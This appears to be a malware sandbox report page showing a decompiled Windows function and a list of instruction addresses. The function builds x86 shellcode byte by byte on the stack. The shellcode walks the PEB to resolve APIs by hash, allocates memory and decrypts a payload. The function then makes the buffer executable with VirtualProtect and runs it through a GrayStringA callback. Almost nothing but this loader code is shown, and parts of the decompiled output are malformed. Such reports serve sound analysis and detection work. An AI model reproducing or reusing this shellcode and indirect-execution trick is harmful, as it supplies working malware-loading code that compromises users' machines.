Function 00D41670, Relevance: 342.0, APIs: 6, Strings: 189, Instructions: 767
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D41670(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				_Unknown_base(*)() _v628;
				struct HWND__* _v632;
				struct HWND__** _v636;
				char _v640;
				struct HWND__* _v644;
				long _v648;
				void* _v1648;
				void* _t772;

				_v628 = 0xe9;
				_v627 = 0xcc;
				_v626 = 0;
				_v625 = 0;
				_v624 = 0;
				_v623 = 0x55;
				_v622 = 0x8b;
				_v621 = 0xec;
				_v620 = 0x56;
				_v619 = 0x8b;
				_v618 = 0x75;
				_v617 = 8;
				_v616 = 0xba;
				_v615 = 0xff;
				_v614 = 0x1c;
				_v613 = 0;
				_v612 = 0;
				_v611 = 0x57;
				_v610 = 0xeb;
				_v609 = 0xe;
				_v608 = 0x8b;
				_v607 = 0xca;
				_v606 = 0xd1;
				_v605 = 0xe8;
				_v604 = 0xc1;
				_v603 = 0xe1;
				_v602 = 7;
				_v601 = 0x46;
				_v600 = 0xb;
				_v599 = 0xc8;
				_v598 = 3;
				_v597 = 0xcf;
				_v596 = 3;
				_v595 = 0xd1;
				_v594 = 0xf;
				_v593 = 0xbe;
				_v592 = 0x3e;
				_v591 = 0x8b;
				_v590 = 0xc2;
				_v589 = 0x85;
				_v588 = 0xff;
				_v587 = 0x75;
				_v586 = 0xe9;
				_v585 = 0x5f;
				_v584 = 0x5e;
				_v583 = 0x5d;
				_v582 = 0xc3;
				_v581 = 0x55;
				_v580 = 0x8b;
				_v579 = 0xec;
				_v578 = 0x83;
				_v577 = 0xec;
				_v576 = 0x1c;
				_v575 = 0x83;
				_v574 = 0x65;
				_v573 = 0xfc;
				_v572 = 0;
				_v571 = 0x8b;
				_v570 = 0x45;
				_v569 = 8;
				_v568 = 0x89;
				_v567 = 0x45;
				_v566 = 0xf4;
				_v565 = 0x8b;
				_v564 = 0x45;
				_v563 = 0xf4;
				_v562 = 0x8b;
				_v561 = 0x4d;
				_v560 = 8;
				_v559 = 3;
				_v558 = 0x48;
				_v557 = 0x3c;
				_v556 = 0x89;
				_v555 = 0x4d;
				_v554 = 0xf0;
				_v553 = 0x6a;
				_v552 = 8;
				_v551 = 0x58;
				_v550 = 0x6b;
				_v549 = 0xc0;
				_v548 = 0;
				_v547 = 0x8b;
				_v546 = 0x4d;
				_v545 = 0xf0;
				_v544 = 0x8b;
				_v543 = 0x55;
				_v542 = 8;
				_v541 = 3;
				_v540 = 0x54;
				_v539 = 1;
				_v538 = 0x78;
				_v537 = 0x89;
				_v536 = 0x55;
				_v535 = 0xf8;
				_v534 = 0x8b;
				_v533 = 0x45;
				_v532 = 0xf8;
				_v531 = 0x8b;
				_v530 = 0x4d;
				_v529 = 8;
				_v528 = 3;
				_v527 = 0x48;
				_v526 = 0x20;
				_v525 = 0x89;
				_v524 = 0x4d;
				_v523 = 0xec;
				_v522 = 0x8b;
				_v521 = 0x45;
				_v520 = 0xf8;
				_v519 = 0x8b;
				_v518 = 0x4d;
				_v517 = 8;
				_v516 = 3;
				_v515 = 0x48;
				_v514 = 0x1c;
				_v513 = 0x89;
				_v512 = 0x4d;
				_v511 = 0xe4;
				_v510 = 0x8b;
				_v509 = 0x45;
				_v508 = 0xf8;
				_v507 = 0x8b;
				_v506 = 0x4d;
				_v505 = 8;
				_v504 = 3;
				_v503 = 0x48;
				_v502 = 0x24;
				_v501 = 0x89;
				_v500 = 0x4d;
				_v499 = 0xe8;
				_v498 = 0x83;
				_v497 = 0x65;
				_v496 = 0xfc;
				_v495 = 0;
				_v494 = 0xeb;
				_v493 = 7;
				_v492 = 0x8b;
				_v491 = 0x45;
				_v490 = 0xfc;
				_v489 = 0x40;
				_v488 = 0x89;
				_v487 = 0x45;
				_v486 = 0xfc;
				_v485 = 0x8b;
				_v484 = 0x45;
				_v483 = 0xf8;
				_v482 = 0x8b;
				_v481 = 0x4d;
				_v480 = 0xfc;
				_v479 = 0x3b;
				_v478 = 0x48;
				_v477 = 0x18;
				_v476 = 0x73;
				_v475 = 0x31;
				_v474 = 0x8b;
				_v473 = 0x45;
				_v472 = 0xfc;
				_v471 = 0x8b;
				_v470 = 0x4d;
				_v469 = 0xec;
				_v468 = 0x8b;
				_v467 = 0x55;
				_v466 = 8;
				_v465 = 3;
				_v464 = 0x14;
				_v463 = 0x81;
				_v462 = 0x52;
				_v461 = 0xe8;
				_v460 = 0x59;
				_v459 = 0xff;
				_v458 = 0xff;
				_v457 = 0xff;
				_v456 = 0x59;
				_v455 = 0x3b;
				_v454 = 0x45;
				_v453 = 0xc;
				_v452 = 0x75;
				_v451 = 0x17;
				_v450 = 0x8b;
				_v449 = 0x45;
				_v448 = 0xfc;
				_v447 = 0x8b;
				_v446 = 0x4d;
				_v445 = 0xe8;
				_v444 = 0xf;
				_v443 = 0xb7;
				_v442 = 4;
				_v441 = 0x41;
				_v440 = 0x8b;
				_v439 = 0x4d;
				_v438 = 0xe4;
				_v437 = 0x8b;
				_v436 = 0x55;
				_v435 = 8;
				_v434 = 3;
				_v433 = 0x14;
				_v432 = 0x81;
				_v431 = 0x8b;
				_v430 = 0xc2;
				_v429 = 0xeb;
				_v428 = 4;
				_v427 = 0xeb;
				_v426 = 0xbd;
				_v425 = 0x33;
				_v424 = 0xc0;
				_v423 = 0x8b;
				_v422 = 0xe5;
				_v421 = 0x5d;
				_v420 = 0xc3;
				_v419 = 0x55;
				_v418 = 0x8b;
				_v417 = 0xec;
				_v416 = 0x83;
				_v415 = 0xec;
				_v414 = 0x14;
				_v413 = 0x53;
				_v412 = 0x56;
				_v411 = 0x57;
				_v410 = 0x6a;
				_v409 = 0x4f;
				_v408 = 0x5e;
				_v407 = 0x6a;
				_v406 = 0x5a;
				_v405 = 0x5a;
				_v404 = 0x6a;
				_v403 = 0x58;
				_v402 = 0x59;
				_v401 = 0x33;
				_v400 = 0xc0;
				_v399 = 0x66;
				_v398 = 0x89;
				_v397 = 0x75;
				_v396 = 0xf4;
				_v395 = 0x66;
				_v394 = 0x89;
				_v393 = 0x55;
				_v392 = 0xf6;
				_v391 = 0x66;
				_v390 = 0x89;
				_v389 = 0x4d;
				_v388 = 0xf8;
				_v387 = 0x66;
				_v386 = 0x89;
				_v385 = 0x45;
				_v384 = 0xfa;
				_v383 = 0x66;
				_v382 = 0x89;
				_v381 = 0x75;
				_v380 = 0xec;
				_v379 = 0x66;
				_v378 = 0x89;
				_v377 = 0x55;
				_v376 = 0xee;
				_v375 = 0x66;
				_v374 = 0x89;
				_v373 = 0x4d;
				_v372 = 0xf0;
				_v371 = 0x66;
				_v370 = 0x89;
				_v369 = 0x45;
				_v368 = 0xf2;
				_v367 = 0x64;
				_v366 = 0xa1;
				_v365 = 0x30;
				_v364 = 0;
				_v363 = 0;
				_v362 = 0;
				_v361 = 0x8b;
				_v360 = 0x40;
				_v359 = 0xc;
				_v358 = 0x8b;
				_v357 = 0x40;
				_v356 = 0xc;
				_v355 = 0x8b;
				_v354 = 0;
				_v353 = 0x8b;
				_v352 = 0;
				_v351 = 0x8b;
				_v350 = 0x40;
				_v349 = 0x18;
				_v348 = 0x8b;
				_v347 = 0xf0;
				_v346 = 0x68;
				_v345 = 0xe3;
				_v344 = 0xdd;
				_v343 = 0xdf;
				_v342 = 0x7c;
				_v341 = 0x56;
				_v340 = 0xe8;
				_v339 = 0xa;
				_v338 = 0xff;
				_v337 = 0xff;
				_v336 = 0xff;
				_v335 = 0x68;
				_v334 = 0xd3;
				_v333 = 0x7f;
				_v332 = 0xf7;
				_v331 = 0x2e;
				_v330 = 0x56;
				_v329 = 0x8b;
				_v328 = 0xd8;
				_v327 = 0xe8;
				_v326 = 0xfd;
				_v325 = 0xfe;
				_v324 = 0xff;
				_v323 = 0xff;
				_v322 = 0x68;
				_v321 = 0xdf;
				_v320 = 0x74;
				_v319 = 0xfc;
				_v318 = 0x83;
				_v317 = 0x56;
				_v316 = 0x8b;
				_v315 = 0xf8;
				_v314 = 0xe8;
				_v313 = 0xf0;
				_v312 = 0xfe;
				_v311 = 0xff;
				_v310 = 0xff;
				_v309 = 0x83;
				_v308 = 0xc4;
				_v307 = 0x18;
				_v306 = 0x8b;
				_v305 = 0xf0;
				_v304 = 0x6a;
				_v303 = 4;
				_v302 = 0x68;
				_v301 = 0;
				_v300 = 0x30;
				_v299 = 0;
				_v298 = 0;
				_v297 = 0x68;
				_v296 = 0xa;
				_v295 = 0x79;
				_v294 = 3;
				_v293 = 0;
				_v292 = 0x6a;
				_v291 = 0;
				_v290 = 0xff;
				_v289 = 0xd3;
				_v288 = 0x89;
				_v287 = 0x45;
				_v286 = 0xfc;
				_v285 = 0x8d;
				_v284 = 0x45;
				_v283 = 0xf4;
				_v282 = 0x50;
				_v281 = 0x8d;
				_v280 = 0x45;
				_v279 = 0xec;
				_v278 = 0x50;
				_v277 = 0x6a;
				_v276 = 0;
				_v275 = 0xff;
				_v274 = 0xd7;
				_v273 = 0x50;
				_v272 = 0x33;
				_v271 = 0xff;
				_v270 = 0x57;
				_v269 = 0xff;
				_v268 = 0xd6;
				_v267 = 0x68;
				_v266 = 0xa;
				_v265 = 0x79;
				_v264 = 3;
				_v263 = 0;
				_v262 = 0x50;
				_v261 = 0xff;
				_v260 = 0x75;
				_v259 = 0xfc;
				_v258 = 0xe8;
				_v257 = 0xba;
				_v256 = 0;
				_v255 = 0;
				_v254 = 0;
				_v253 = 0x83;
				_v252 = 0xc4;
				_v251 = 0xc;
				_v250 = 0x6a;
				_v249 = 0x40;
				_v248 = 0x68;
				_v247 = 0;
				_v246 = 0x30;
				_v245 = 0;
				_v244 = 0;
				_v243 = 0x68;
				_v242 = 0xb;
				_v241 = 0x17;
				_v240 = 0;
				_v239 = 0;
				_v238 = 0x57;
				_v237 = 0xff;
				_v236 = 0xd3;
				_v235 = 0x6a;
				_v234 = 4;
				_v233 = 0x68;
				_v232 = 0;
				_v231 = 0x30;
				_v230 = 0;
				_v229 = 0;
				_v228 = 0x68;
				_v227 = 0xff;
				_v226 = 0x61;
				_v225 = 3;
				_v224 = 0;
				_v223 = 0x57;
				_v222 = 0x8b;
				_v221 = 0xf0;
				_v220 = 0xff;
				_v219 = 0xd3;
				_v218 = 0x8b;
				_v217 = 0x5d;
				_v216 = 0xfc;
				_v215 = 0x8b;
				_v214 = 0xf8;
				_v213 = 0x68;
				_v212 = 0xb;
				_v211 = 0x17;
				_v210 = 0;
				_v209 = 0;
				_v208 = 0x53;
				_v207 = 0x56;
				_v206 = 0xe8;
				_v205 = 0x86;
				_v204 = 0;
				_v203 = 0;
				_v202 = 0;
				_v201 = 0x83;
				_v200 = 0xc4;
				_v199 = 0xc;
				_v198 = 0x33;
				_v197 = 0xd2;
				_v196 = 0x8a;
				_v195 = 4;
				_v194 = 0x32;
				_v193 = 0x8a;
				_v192 = 0xca;
				_v191 = 4;
				_v190 = 0x1a;
				_v189 = 0x34;
				_v188 = 0xa2;
				_v187 = 0x2a;
				_v186 = 0xc2;
				_v185 = 0x32;
				_v184 = 0xc2;
				_v183 = 0x2a;
				_v182 = 0xc8;
				_v181 = 0x32;
				_v180 = 0xca;
				_v179 = 0xf6;
				_v178 = 0xd9;
				_v177 = 0x80;
				_v176 = 0xf1;
				_v175 = 0xfb;
				_v174 = 0xfe;
				_v173 = 0xc9;
				_v172 = 2;
				_v171 = 0xca;
				_v170 = 0x80;
				_v169 = 0xf1;
				_v168 = 0xf;
				_v167 = 0xf6;
				_v166 = 0xd9;
				_v165 = 0xc0;
				_v164 = 0xc1;
				_v163 = 2;
				_v162 = 0x80;
				_v161 = 0xc1;
				_v160 = 0x5c;
				_v159 = 0xd0;
				_v158 = 0xc9;
				_v157 = 0x32;
				_v156 = 0xca;
				_v155 = 0xf6;
				_v154 = 0xd9;
				_v153 = 0x80;
				_v152 = 0xf1;
				_v151 = 0x1e;
				_v150 = 0xf6;
				_v149 = 0xd1;
				_v148 = 0x80;
				_v147 = 0xe9;
				_v146 = 0x1d;
				_v145 = 0xf6;
				_v144 = 0xd1;
				_v143 = 0x80;
				_v142 = 0xc1;
				_v141 = 0x4b;
				_v140 = 0x80;
				_v139 = 0xf1;
				_v138 = 0x55;
				_v137 = 0xc0;
				_v136 = 0xc1;
				_v135 = 2;
				_v134 = 0x2a;
				_v133 = 0xca;
				_v132 = 0xd0;
				_v131 = 0xc9;
				_v130 = 0x32;
				_v129 = 0xca;
				_v128 = 2;
				_v127 = 0xca;
				_v126 = 0x80;
				_v125 = 0xf1;
				_v124 = 0x9e;
				_v123 = 0x80;
				_v122 = 0xc1;
				_v121 = 0x7f;
				_v120 = 2;
				_v119 = 0xca;
				_v118 = 0x80;
				_v117 = 0xf1;
				_v116 = 0x8a;
				_v115 = 0x2a;
				_v114 = 0xca;
				_v113 = 0x80;
				_v112 = 0xc1;
				_v111 = 0x3f;
				_v110 = 0x88;
				_v109 = 0xc;
				_v108 = 0x32;
				_v107 = 0x42;
				_v106 = 0x81;
				_v105 = 0xfa;
				_v104 = 0xb;
				_v103 = 0x17;
				_v102 = 0;
				_v101 = 0;
				_v100 = 0x72;
				_v99 = 0x9e;
				_v98 = 0x68;
				_v97 = 0xff;
				_v96 = 0x61;
				_v95 = 3;
				_v94 = 0;
				_v93 = 0x8d;
				_v92 = 0x83;
				_v91 = 0xb;
				_v90 = 0x17;
				_v89 = 0;
				_v88 = 0;
				_v87 = 0x50;
				_v86 = 0x57;
				_v85 = 0xe8;
				_v84 = 0xd;
				_v83 = 0;
				_v82 = 0;
				_v81 = 0;
				_v80 = 0x57;
				_v79 = 0xff;
				_v78 = 0xd6;
				_v77 = 0x83;
				_v76 = 0xc4;
				_v75 = 0x10;
				_v74 = 0x5f;
				_v73 = 0x5e;
				_v72 = 0x5b;
				_v71 = 0x8b;
				_v70 = 0xe5;
				_v69 = 0x5d;
				_v68 = 0xc3;
				_v67 = 0x55;
				_v66 = 0x8b;
				_v65 = 0xec;
				_v64 = 0x8b;
				_v63 = 0x55;
				_v62 = 0x10;
				_v61 = 0x85;
				_v60 = 0xd2;
				_v59 = 0x74;
				_v58 = 0x15;
				_v57 = 0x8b;
				_v56 = 0x4d;
				_v55 = 8;
				_v54 = 0x56;
				_v53 = 0x8b;
				_v52 = 0x75;
				_v51 = 0xc;
				_v50 = 0x2b;
				_v49 = 0xf1;
				_v48 = 0x8a;
				_v47 = 4;
				_v46 = 0xe;
				_v45 = 0x88;
				_v44 = 1;
				_v43 = 0x41;
				_v42 = 0x83;
				_v41 = 0xea;
				_v40 = 1;
				_v39 = 0x75;
				_v38 = 0xf5;
				_v37 = 0x5e;
				_v36 = 0x5d;
				_v35 = 0xc3;
				_v34 = 0;
				_v33 = 0;
				_v32 = 0;
				_v31 = 0;
				_v640 = 0xa;
				_v636 =  &_v640;
				_v24 = 0x3b;
				_v23 = 0x2d;
				_v22 = 0x19;
				_v21 = 0x72;
				_v20 = 0x73;
				_v632 = 0;
				_v644 = 0;
				while(1) {
					 *(_t772 + 0xfffffffffffffff4) = 0xf;
					 *(_t772 + 0xbadba1) = 0x1f;
					 *(_t772 + 0xbadba1) = 0x2d;
					 *(_t772 + 0xfffffffffffffff7) = 0x46;
					 *(_t772 + 0xbadba1) = 0x41;
					_v636 =  &_v632;
					_v28 = 0;
					while(_v28 < 5) {
						 *(_t772 + _v28 - 0xc) =  *(_t772 + _v28 - 0xc) & 0x000000ff ^  *(_v636 + _v28 % 3);
						_v28 = _v28 + 1;
					}
					if(( *(_t772 + 0xffffffffffffffec) & 0x000000ff) == ( *(_t772 + 0xfffffffffffffff4) & 0x000000ff) || ( *(_t772 + 0xbadb99) & 0x000000ff) == ( *(_t772 + 0xbadba1) & 0x000000ff) || ( *(_t772 + 0xbadb99) & 0x000000ff) == ( *(_t772 + 0xbadba1) & 0x000000ff) || ( *(_t772 + 0xffffffffffffffef) & 0x000000ff) == ( *(_t772 + 0xfffffffffffffff7) & 0x000000ff) || ( *(_t772 + 0xbadb99) & 0x000000ff) == ( *(_t772 + 0xbadba1) & 0x000000ff)) {
						VirtualProtect( &_v628, 0x256, 0x40,  &_v648); // executed
						GrayStringA(GetDC(0), 0,  &_v628,  &_v1648, 0, 0, 0, 0, 0); // executed
						MessageBoxW(0, 0, 0, 0);
						_v8 = 1;
						while(_v8 < _a4) {
							if(lstrcmpiW( *(_a8 + _v8 * 4), L"/k") == 0 || lstrcmpiW( *(_a8 + _v8 * 4), L"-k") == 0) {
								_v8 = _v8 + 1;
								if(_v8 < _a4) {
									if(E00D415A0( *(_a8 + _v8 * 4)) != 0) {
										_v8 = _v8 + 1;
										continue;
									}
									return 0;
								}
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						_v632 =  &(_v632->i);
						continue;
					}
				}
			}

0x00d41679
0x00d41680
0x00d41687
0x00d4168e
0x00d41695
0x00d4169c
0x00d416a3
0x00d416aa
0x00d416b1
0x00d416b8
0x00d416bf
0x00d416c6
0x00d416cd
0x00d416d4
0x00d416db
0x00d416e2
0x00d416e9
0x00d416f0
0x00d416f7
0x00d416fe
0x00d41705
0x00d4170c
0x00d41713
0x00d4171a
0x00d41721
0x00d41728
0x00d4172f
0x00d41736
0x00d4173d
0x00d41744
0x00d4174b
0x00d41752
0x00d41759
0x00d41760
0x00d41767
0x00d4176e
0x00d41775
0x00d4177c
0x00d41783
0x00d4178a
0x00d41791
0x00d41798
0x00d4179f
0x00d417a6
0x00d417ad
0x00d417b4
0x00d417bb
0x00d417c2
0x00d417c9
0x00d417d0
0x00d417d7
0x00d417de
0x00d417e5
0x00d417ec
0x00d417f3
0x00d417fa
0x00d41801
0x00d41808
0x00d4180f
0x00d41816
0x00d4181d
0x00d41824
0x00d4182b
0x00d41832
0x00d41839
0x00d41840
0x00d41847
0x00d4184e
0x00d41855
0x00d4185c
0x00d41863
0x00d4186a
0x00d41871
0x00d41878
0x00d4187f
0x00d41886
0x00d4188d
0x00d41894
0x00d4189b
0x00d418a2
0x00d418a9
0x00d418b0
0x00d418b7
0x00d418be
0x00d418c5
0x00d418cc
0x00d418d3
0x00d418da
0x00d418e1
0x00d418e8
0x00d418ef
0x00d418f6
0x00d418fd
0x00d41904
0x00d4190b
0x00d41912
0x00d41919
0x00d41920
0x00d41927
0x00d4192e
0x00d41935
0x00d4193c
0x00d41943
0x00d4194a
0x00d41951
0x00d41958
0x00d4195f
0x00d41966
0x00d4196d
0x00d41974
0x00d4197b
0x00d41982
0x00d41989
0x00d41990
0x00d41997
0x00d4199e
0x00d419a5
0x00d419ac
0x00d419b3
0x00d419ba
0x00d419c1
0x00d419c8
0x00d419cf
0x00d419d6
0x00d419dd
0x00d419e4
0x00d419eb
0x00d419f2
0x00d419f9
0x00d41a00
0x00d41a07
0x00d41a0e
0x00d41a15
0x00d41a1c
0x00d41a23
0x00d41a2a
0x00d41a31
0x00d41a38
0x00d41a3f
0x00d41a46
0x00d41a4d
0x00d41a54
0x00d41a5b
0x00d41a62
0x00d41a69
0x00d41a70
0x00d41a77
0x00d41a7e
0x00d41a85
0x00d41a8c
0x00d41a93
0x00d41a9a
0x00d41aa1
0x00d41aa8
0x00d41aaf
0x00d41ab6
0x00d41abd
0x00d41ac4
0x00d41acb
0x00d41ad2
0x00d41ad9
0x00d41ae0
0x00d41ae7
0x00d41aee
0x00d41af5
0x00d41afc
0x00d41b03
0x00d41b0a
0x00d41b11
0x00d41b18
0x00d41b1f
0x00d41b26
0x00d41b2d
0x00d41b34
0x00d41b3b
0x00d41b42
0x00d41b49
0x00d41b50
0x00d41b57
0x00d41b5e
0x00d41b65
0x00d41b6c
0x00d41b73
0x00d41b7a
0x00d41b81
0x00d41b88
0x00d41b8f
0x00d41b96
0x00d41b9d
0x00d41ba4
0x00d41bab
0x00d41bb2
0x00d41bb9
0x00d41bc0
0x00d41bc7
0x00d41bce
0x00d41bd5
0x00d41bdc
0x00d41be3
0x00d41bea
0x00d41bf1
0x00d41bf8
0x00d41bff
0x00d41c06
0x00d41c0d
0x00d41c14
0x00d41c1b
0x00d41c22
0x00d41c29
0x00d41c30
0x00d41c37
0x00d41c3e
0x00d41c45
0x00d41c4c
0x00d41c53
0x00d41c5a
0x00d41c61
0x00d41c68
0x00d41c6f
0x00d41c76
0x00d41c7d
0x00d41c84
0x00d41c8b
0x00d41c92
0x00d41c99
0x00d41ca0
0x00d41ca7
0x00d41cae
0x00d41cb5
0x00d41cbc
0x00d41cc3
0x00d41cca
0x00d41cd1
0x00d41cd8
0x00d41cdf
0x00d41ce6
0x00d41ced
0x00d41cf4
0x00d41cfb
0x00d41d02
0x00d41d09
0x00d41d10
0x00d41d17
0x00d41d1e
0x00d41d25
0x00d41d2c
0x00d41d33
0x00d41d3a
0x00d41d41
0x00d41d48
0x00d41d4f
0x00d41d56
0x00d41d5d
0x00d41d64
0x00d41d6b
0x00d41d72
0x00d41d79
0x00d41d80
0x00d41d87
0x00d41d8e
0x00d41d95
0x00d41d9c
0x00d41da3
0x00d41daa
0x00d41db1
0x00d41db8
0x00d41dbf
0x00d41dc6
0x00d41dcd
0x00d41dd4
0x00d41ddb
0x00d41de2
0x00d41de9
0x00d41df0
0x00d41df7
0x00d41dfe
0x00d41e05
0x00d41e0c
0x00d41e13
0x00d41e1a
0x00d41e21
0x00d41e28
0x00d41e2f
0x00d41e36
0x00d41e3d
0x00d41e44
